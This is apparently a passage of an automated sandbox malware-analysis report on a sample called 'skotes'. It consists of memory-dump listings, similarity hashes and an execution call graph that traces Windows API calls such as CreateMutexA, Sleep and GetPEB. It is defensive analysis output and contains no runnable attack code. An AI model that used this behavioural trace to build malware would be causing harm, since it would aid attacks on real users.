                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303981276.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303998935.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304017483.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304040930.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304064091.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304087036.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304108487.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304129725.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304151798.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304175036.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304197614.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304219810.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304244496.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304265215.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304287039.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304308262.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304330116.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304354120.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304380462.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304403341.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304403341.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304470945.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304494629.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304518931.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304543821.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304567673.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304598136.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304628525.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_f30000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _strrchr
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3213747228-0
                                                                                                                                                                                                                                                  • Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                                  • Instruction ID: c53fafddc465433499df8f720250a1c6099257d3a9e3fa3b0491c811a430a080
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6DB11232D046859FDB11CF28C8817BEBBF5EF55350F14816AD8D5EB242D6399D02EBA0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303356524.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303381446.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303459464.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303477571.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303497897.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303627759.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303648741.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303675886.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303722979.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303745549.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303767974.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303790215.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303815004.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303831777.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303854600.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303873017.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303893080.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303916455.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303943200.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303965962.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303981276.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303998935.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304017483.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304040930.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304064091.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304087036.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304108487.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304129725.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304151798.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304175036.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304197614.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304219810.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304244496.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304265215.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304287039.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304308262.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304330116.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304354120.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304380462.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304403341.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304403341.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304470945.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304494629.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304518931.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304543821.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304567673.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304598136.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304628525.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_f30000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 531285432-0
                                                                                                                                                                                                                                                  • Opcode ID: dc4fa01a7bd77237d454399baa41bf09f719295e39e4dd52fd49e4ba11d7ee21
                                                                                                                                                                                                                                                  • Instruction ID: a21de586506f67550394c0ba6fefc9a77e5b47f3cb337d253ae384483fc69e50
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc4fa01a7bd77237d454399baa41bf09f719295e39e4dd52fd49e4ba11d7ee21
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5214F71E01119AFDF40EFA4DC819BEBBB9EF08720F114415FA05A7261DB389D05ABA0

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:1.1%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                  Total number of Nodes:1885
                                                                                                                                                                                                                                                  Total number of Limit Nodes:15
                                                                                                                                                                                                                                                  execution_graph 9892 f49ef0 9893 f49f0c 9892->9893 9896 f4c68b 9893->9896 9895 f49f17 9899 f4c3d5 9896->9899 9898 f4c69b 9898->9895 9900 f4c3e1 9899->9900 9901 f4c3eb 9899->9901 9902 f4c39e 9900->9902 9903 f4c3be 9900->9903 9901->9898 9902->9901 9908 f4ccd5 9902->9908 9912 f4cd0a 9903->9912 9906 f4c3d0 9906->9898 9909 f4cce3 InitializeCriticalSectionEx 9908->9909 9910 f4c3b7 9908->9910 9909->9910 9910->9898 9913 f4cd1f RtlInitializeConditionVariable 9912->9913 9913->9906 9914 f744f2 9915 f744ff 9914->9915 9916 f7450c 9914->9916 9917 f675f6 __dosmaperr RtlAllocateHeap 9915->9917 9918 f74518 9916->9918 9919 f675f6 __dosmaperr RtlAllocateHeap 9916->9919 9920 f74504 9917->9920 9921 f74539 9919->9921 9922 f66c5a __cftof RtlAllocateHeap 9921->9922 9922->9920 9923 f318e0 9924 f480c0 RtlAllocateHeap 9923->9924 9925 f318f1 9924->9925 9928 f4d64e 9925->9928 9931 f4d621 9928->9931 9932 f4d637 9931->9932 9933 f4d630 9931->9933 9940 f698fa 9932->9940 9937 f6988e 9933->9937 9936 f318fb 9938 f698fa RtlAllocateHeap 9937->9938 9939 f698a0 9938->9939 9939->9936 9943 f69630 9940->9943 9942 f6992b 9942->9936 9944 f6963c __dosmaperr 9943->9944 9947 f6968b 9944->9947 9946 f69657 9946->9942 9948 f696a7 9947->9948 9956 f6971e __dosmaperr 9947->9956 9949 f696fe 9948->9949 9948->9956 9957 f6edf6 9948->9957 9951 f6edf6 RtlAllocateHeap 9949->9951 9949->9956 9953 f69714 9951->9953 9952 f696f4 9954 f6adf5 ___free_lconv_mon RtlAllocateHeap 9952->9954 9955 f6adf5 ___free_lconv_mon RtlAllocateHeap 9953->9955 9954->9949 9955->9956 9956->9946 9956->9956 9958 f6ee03 9957->9958 9959 f6ee1e 9957->9959 9958->9959 9960 f6ee0f 9958->9960 9961 f6ee2d 9959->9961 9966 f74fdc 9959->9966 9962 f675f6 __dosmaperr RtlAllocateHeap 9960->9962 9973 f7500f 9961->9973 9965 f6ee14 __cftof 9962->9965 9965->9952 9967 f74fe7 9966->9967 9968 f74ffc 9966->9968 9969 f675f6 __dosmaperr RtlAllocateHeap 9967->9969 9968->9961 9970 f74fec 9969->9970 9971 f66c5a __cftof RtlAllocateHeap 9970->9971 9972 f74ff7 9971->9972 9972->9961 9974 f75027 9973->9974 9975 f7501c 9973->9975 9977 f7502f 9974->9977 9981 f75038 __dosmaperr 9974->9981 9982 f6b04b 9975->9982 9978 f6adf5 ___free_lconv_mon RtlAllocateHeap 9977->9978 9980 f75024 9978->9980 9979 f675f6 __dosmaperr RtlAllocateHeap 9979->9980 9980->9965 9981->9979 9981->9980 9984 f6b059 __dosmaperr 9982->9984 9983 f675f6 __dosmaperr RtlAllocateHeap 9985 f6b087 9983->9985 9984->9983 9984->9985 9985->9980 10029 f36ae9 10032 f36b01 10029->10032 10030 f480c0 RtlAllocateHeap 10031 f36bac 10030->10031 10037 f49280 10031->10037 10032->10030 10034 f36bbd shared_ptr 10032->10034 10035 f480c0 RtlAllocateHeap 10034->10035 10036 f36ce3 shared_ptr __floor_pentium4 10035->10036 10038 f49294 10037->10038 10041 f492a5 __cftof 10038->10041 10042 f494e0 10038->10042 10040 f4932b 10040->10034 10041->10034 10043 f49619 10042->10043 10044 f4950b 10042->10044 10045 f49270 RtlAllocateHeap 10043->10045 10048 f49552 10044->10048 10049 f49579 10044->10049 10046 f4961e 10045->10046 10047 f32480 RtlAllocateHeap 10046->10047 10055 f49563 __cftof 10047->10055 10048->10046 10050 f4955d 10048->10050 10051 f4d3e2 RtlAllocateHeap 10049->10051 10049->10055 10053 f4d3e2 RtlAllocateHeap 10050->10053 10051->10055 10052 f66c6a RtlAllocateHeap 10054 f49628 shared_ptr 10052->10054 10053->10055 10054->10040 10055->10052 10056 f495e1 shared_ptr __cftof 10055->10056 10056->10040 10057 f39adc 10061 f39aea shared_ptr 10057->10061 10058 f3a917 10059 f3a953 Sleep CreateMutexA 10058->10059 10060 f66c6a RtlAllocateHeap 10058->10060 10062 f3a98e 10059->10062 10060->10059 10061->10058 10063 f39b4b shared_ptr 10061->10063 10064 f39b65 10063->10064 10065 f39b59 10063->10065 10084 f47a00 10064->10084 10068 f480c0 RtlAllocateHeap 10065->10068 10067 f39b74 10098 f35c10 10067->10098 10070 f3a903 10068->10070 10071 f39b7c 10149 f38b30 10071->10149 10073 f39b8d 10186 f48220 10073->10186 10075 f39b9c 10076 f47a00 RtlAllocateHeap 10075->10076 10077 f39ca9 10076->10077 10078 f35c10 4 API calls 10077->10078 10079 f39cb1 10078->10079 10080 f38b30 4 API calls 10079->10080 10081 f39cc2 10080->10081 10082 f48220 RtlAllocateHeap 10081->10082 10083 f39cd1 10082->10083 10085 f47a26 10084->10085 10086 f47a2d 10085->10086 10087 f47a81 10085->10087 10088 f47a62 10085->10088 10086->10067 10093 f4d3e2 RtlAllocateHeap 10087->10093 10095 f47a76 __cftof 10087->10095 10089 f47ab9 10088->10089 10090 f47a69 10088->10090 10091 f32480 RtlAllocateHeap 10089->10091 10092 f4d3e2 RtlAllocateHeap 10090->10092 10094 f47a6f 10091->10094 10092->10094 10093->10095 10094->10095 10096 f66c6a RtlAllocateHeap 10094->10096 10095->10067 10097 f47ac3 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 10096->10097 10097->10067 10194 f35940 10098->10194 10100 f35c54 10197 f34b30 10100->10197 10102 f35d17 shared_ptr __floor_pentium4 10102->10071 10103 f35c7b shared_ptr 10103->10102 10104 f66c6a RtlAllocateHeap 10103->10104 10105 f35d47 __cftof 10104->10105 10105->10105 10106 f480c0 RtlAllocateHeap 10105->10106 10108 f35e3e 10106->10108 10107 f35ea6 shared_ptr __floor_pentium4 10107->10071 10108->10107 10109 f66c6a RtlAllocateHeap 10108->10109 10110 f35ed2 10109->10110 10111 f35ffe shared_ptr __floor_pentium4 10110->10111 10112 f66c6a RtlAllocateHeap 10110->10112 10111->10071 10113 f3601b 10112->10113 10114 f480c0 RtlAllocateHeap 10113->10114 10115 f36089 10114->10115 10116 f480c0 RtlAllocateHeap 10115->10116 10117 f360bd 10116->10117 10118 f480c0 RtlAllocateHeap 10117->10118 10119 f360ee 10118->10119 10120 f480c0 RtlAllocateHeap 10119->10120 10121 f3611f 10120->10121 10122 f480c0 RtlAllocateHeap 10121->10122 10124 f36150 10122->10124 10123 f365b1 shared_ptr __floor_pentium4 10123->10071 10124->10123 10125 f66c6a RtlAllocateHeap 10124->10125 10126 f365dc 10125->10126 10127 f47a00 RtlAllocateHeap 10126->10127 10128 f366a6 10127->10128 10129 f35c10 4 API calls 10128->10129 10130 f366ac 10129->10130 10131 f35c10 4 API calls 10130->10131 10132 f366b1 10131->10132 10204 f322c0 10132->10204 10134 f366c9 shared_ptr 10135 f47a00 RtlAllocateHeap 10134->10135 10136 f36732 10135->10136 10137 f35c10 4 API calls 10136->10137 10138 f3673d 10137->10138 10139 f322c0 4 API calls 10138->10139 10148 f36757 shared_ptr 10139->10148 10140 f36852 10141 f480c0 RtlAllocateHeap 10140->10141 10143 f3689c 10141->10143 10142 f47a00 RtlAllocateHeap 10142->10148 10144 f480c0 RtlAllocateHeap 10143->10144 10147 f368e3 shared_ptr __floor_pentium4 10144->10147 10145 f35c10 4 API calls 10145->10148 10146 f322c0 4 API calls 10146->10148 10147->10071 10148->10140 10148->10142 10148->10145 10148->10146 10150 f38b7c 10149->10150 10151 f47a00 RtlAllocateHeap 10150->10151 10152 f38b8c 10151->10152 10153 f35c10 4 API calls 10152->10153 10154 f38b97 10153->10154 10155 f480c0 RtlAllocateHeap 10154->10155 10156 f38be3 10155->10156 10157 f480c0 RtlAllocateHeap 10156->10157 10158 f38c35 10157->10158 10159 f48220 RtlAllocateHeap 10158->10159 10160 f38c47 shared_ptr 10159->10160 10161 f66c6a RtlAllocateHeap 10160->10161 10162 f38d01 shared_ptr __floor_pentium4 10160->10162 10163 f38d2d 10161->10163 10162->10073 10164 f47a00 RtlAllocateHeap 10163->10164 10165 f38d8f 10164->10165 10166 f35c10 4 API calls 10165->10166 10167 f38d9a 10166->10167 10168 f480c0 RtlAllocateHeap 10167->10168 10169 f38dec 10168->10169 10170 f48220 RtlAllocateHeap 10169->10170 10172 f38dfe shared_ptr 10170->10172 10171 f38e7e shared_ptr __floor_pentium4 10171->10073 10172->10171 10173 f66c6a RtlAllocateHeap 10172->10173 10174 f38eaa 10173->10174 10175 f47a00 RtlAllocateHeap 10174->10175 10176 f38f0f 10175->10176 10177 f35c10 4 API calls 10176->10177 10178 f38f1a 10177->10178 10179 f480c0 RtlAllocateHeap 10178->10179 10180 f38f6c 10179->10180 10181 f48220 RtlAllocateHeap 10180->10181 10183 f38f7e shared_ptr 10181->10183 10182 f38ffe shared_ptr __floor_pentium4 10182->10073 10183->10182 10184 f66c6a RtlAllocateHeap 10183->10184 10185 f3902a 10184->10185 10187 f48292 10186->10187 10188 f48248 10186->10188 10191 f482a1 10187->10191 10697 f48f40 10187->10697 10188->10187 10189 f48251 10188->10189 10190 f49280 RtlAllocateHeap 10189->10190 10193 f4825a 10190->10193 10191->10075 10193->10075 10207 f47f80 10194->10207 10196 f3596b 10196->10100 10198 f34dc2 10197->10198 10200 f34b92 10197->10200 10198->10103 10199 f34ce5 10199->10198 10202 f48ca0 RtlAllocateHeap 10199->10202 10200->10199 10222 f66da6 10200->10222 10227 f48ca0 10200->10227 10202->10199 10411 f32280 10204->10411 10208 f47fc7 10207->10208 10209 f47f9e __cftof 10207->10209 10210 f480b3 10208->10210 10214 f4803e 10208->10214 10215 f4801b 10208->10215 10209->10196 10211 f49270 RtlAllocateHeap 10210->10211 10212 f480b8 10211->10212 10213 f32480 RtlAllocateHeap 10212->10213 10216 f480bd 10213->10216 10217 f4d3e2 RtlAllocateHeap 10214->10217 10220 f4802c __cftof 10214->10220 10215->10212 10218 f4d3e2 RtlAllocateHeap 10215->10218 10217->10220 10218->10220 10219 f66c6a RtlAllocateHeap 10219->10210 10220->10219 10221 f48095 shared_ptr 10220->10221 10221->10196 10223 f66db4 10222->10223 10226 f66dc2 10222->10226 10242 f66d19 10223->10242 10226->10200 10228 f48cc3 10227->10228 10229 f48dc9 10227->10229 10233 f48d05 10228->10233 10234 f48d2f 10228->10234 10230 f49270 RtlAllocateHeap 10229->10230 10231 f48dce 10230->10231 10232 f32480 RtlAllocateHeap 10231->10232 10240 f48d16 __cftof 10232->10240 10233->10231 10235 f48d10 10233->10235 10236 f4d3e2 RtlAllocateHeap 10234->10236 10234->10240 10238 f4d3e2 RtlAllocateHeap 10235->10238 10236->10240 10237 f66c6a RtlAllocateHeap 10239 f48dd8 10237->10239 10238->10240 10240->10237 10241 f48d8b shared_ptr __cftof 10240->10241 10241->10200 10247 f6690a 10242->10247 10246 f66d3d 10246->10200 10248 f66921 10247->10248 10249 f6692a 10247->10249 10255 f66d52 10248->10255 10249->10248 10261 f6a671 10249->10261 10256 f66d8f 10255->10256 10257 f66d5f 10255->10257 10395 f6b67d 10256->10395 10260 f66d6e 10257->10260 10390 f6b6a1 10257->10390 10260->10246 10262 f6a67b __dosmaperr 10261->10262 10263 f6d82f __dosmaperr RtlAllocateHeap 10262->10263 10273 f6a694 10262->10273 10264 f6a6bc __dosmaperr 10263->10264 10267 f6a6fc 10264->10267 10268 f6a6c4 __dosmaperr 10264->10268 10265 f6694a 10275 f6b5fb 10265->10275 10269 f6a49f __dosmaperr RtlAllocateHeap 10267->10269 10270 f6adf5 ___free_lconv_mon RtlAllocateHeap 10268->10270 10272 f6a707 10269->10272 10270->10273 10274 f6adf5 ___free_lconv_mon RtlAllocateHeap 10272->10274 10273->10265 10283 f68bec 10273->10283 10274->10273 10276 f6b60e 10275->10276 10278 f66960 10275->10278 10276->10278 10316 f6f5ab 10276->10316 10279 f6b628 10278->10279 10280 f6b650 10279->10280 10281 f6b63b 10279->10281 10280->10248 10281->10280 10329 f6e6b1 10281->10329 10284 f68bf1 __cftof 10283->10284 10285 f68bfc __cftof 10284->10285 10289 f6d634 10284->10289 10310 f665ed 10285->10310 10290 f6d640 __dosmaperr 10289->10290 10291 f6a7c8 __dosmaperr RtlAllocateHeap 10290->10291 10295 f6d667 __cftof 10290->10295 10297 f6d66d __cftof __dosmaperr 10290->10297 10291->10295 10292 f6d6b2 10293 f675f6 __dosmaperr RtlAllocateHeap 10292->10293 10294 f6d6b7 10293->10294 10296 f66c5a __cftof RtlAllocateHeap 10294->10296 10295->10292 10295->10297 10309 f6d69c 10295->10309 10296->10309 10298 f6d726 10297->10298 10299 f6d81b __cftof 10297->10299 10301 f6d751 __cftof 10297->10301 10298->10301 10313 f6d62b 10298->10313 10300 f665ed __cftof 3 API calls 10299->10300 10302 f6d82e 10300->10302 10304 f6a671 __cftof 4 API calls 10301->10304 10307 f6d7a5 10301->10307 10301->10309 10304->10307 10306 f6d62b __cftof 4 API calls 10306->10301 10308 f6a671 __cftof 4 API calls 10307->10308 10307->10309 10308->10309 10309->10285 10311 f664c7 __cftof 3 API calls 10310->10311 10312 f665fe 10311->10312 10314 f6a671 __cftof 4 API calls 10313->10314 10315 f6d630 10314->10315 10315->10306 10317 f6f5b7 __dosmaperr 10316->10317 10318 f6a671 __cftof 4 API calls 10317->10318 10319 f6f5c0 __dosmaperr 10318->10319 10322 f6f606 10319->10322 10325 f6f62c 10319->10325 10321 f6f5ef __cftof 10321->10322 10323 f68bec __cftof 4 API calls 10321->10323 10322->10278 10324 f6f62b 10323->10324 10326 f6f63a __dosmaperr 10325->10326 10328 f6f647 10325->10328 10327 f6f35f __dosmaperr RtlAllocateHeap 10326->10327 10326->10328 10327->10328 10328->10321 10330 f6a671 __cftof 4 API calls 10329->10330 10331 f6e6bb 10330->10331 10334 f6e5c9 10331->10334 10333 f6e6c1 10333->10280 10338 f6e5d5 __dosmaperr 10334->10338 10335 f6e5f6 10335->10333 10336 f6e5ef __cftof 10336->10335 10337 f68bec __cftof 4 API calls 10336->10337 10339 f6e668 10337->10339 10338->10336 10342 f6adf5 ___free_lconv_mon RtlAllocateHeap 10338->10342 10340 f6e6a4 10339->10340 10345 f6a72e 10339->10345 10340->10333 10342->10336 10346 f6a739 __dosmaperr 10345->10346 10347 f6d82f __dosmaperr RtlAllocateHeap 10346->10347 10358 f6a745 10346->10358 10350 f6a769 __dosmaperr 10347->10350 10348 f68bec __cftof 4 API calls 10349 f6a7c7 10348->10349 10352 f6a7a5 10350->10352 10353 f6a771 __dosmaperr 10350->10353 10351 f6a7be 10359 f6e4b0 10351->10359 10354 f6a49f __dosmaperr RtlAllocateHeap 10352->10354 10355 f6adf5 ___free_lconv_mon RtlAllocateHeap 10353->10355 10356 f6a7b0 10354->10356 10355->10358 10357 f6adf5 ___free_lconv_mon RtlAllocateHeap 10356->10357 10357->10358 10358->10348 10358->10351 10360 f6e5c9 __cftof 4 API calls 10359->10360 10361 f6e4c3 10360->10361 10378 f6e259 10361->10378 10364 f6e4dc 10364->10340 10365 f6b04b __cftof RtlAllocateHeap 10366 f6e4ed 10365->10366 10374 f6e51f 10366->10374 10381 f6e6c4 10366->10381 10368 f6adf5 ___free_lconv_mon RtlAllocateHeap 10370 f6e52d 10368->10370 10369 f6e512 10371 f6e535 __cftof 10369->10371 10372 f6e51a 10369->10372 10370->10340 10375 f6e561 10371->10375 10376 f6adf5 ___free_lconv_mon RtlAllocateHeap 10371->10376 10373 f675f6 __dosmaperr RtlAllocateHeap 10372->10373 10373->10374 10374->10368 10375->10374 10386 f6e14b 10375->10386 10376->10375 10379 f6690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10378->10379 10380 f6e26b 10379->10380 10380->10364 10380->10365 10382 f6e259 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10381->10382 10385 f6e6e4 __cftof 10382->10385 10383 f6e75a __cftof __floor_pentium4 10383->10369 10384 f6e32f __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10384->10383 10385->10383 10385->10384 10387 f6e157 __dosmaperr 10386->10387 10388 f6e198 __cftof RtlAllocateHeap 10387->10388 10389 f6e16e __cftof 10388->10389 10389->10374 10391 f6690a __cftof 4 API calls 10390->10391 10392 f6b6be 10391->10392 10394 f6b6ce __floor_pentium4 10392->10394 10400 f6f1bf 10392->10400 10394->10260 10396 f6a671 __cftof 4 API calls 10395->10396 10397 f6b688 10396->10397 10398 f6b5fb __cftof 4 API calls 10397->10398 10399 f6b698 10398->10399 10399->10260 10401 f6690a __cftof 4 API calls 10400->10401 10402 f6f1df __cftof 10401->10402 10403 f6b04b __cftof RtlAllocateHeap 10402->10403 10405 f6f232 __cftof 10402->10405 10406 f6f29d __floor_pentium4 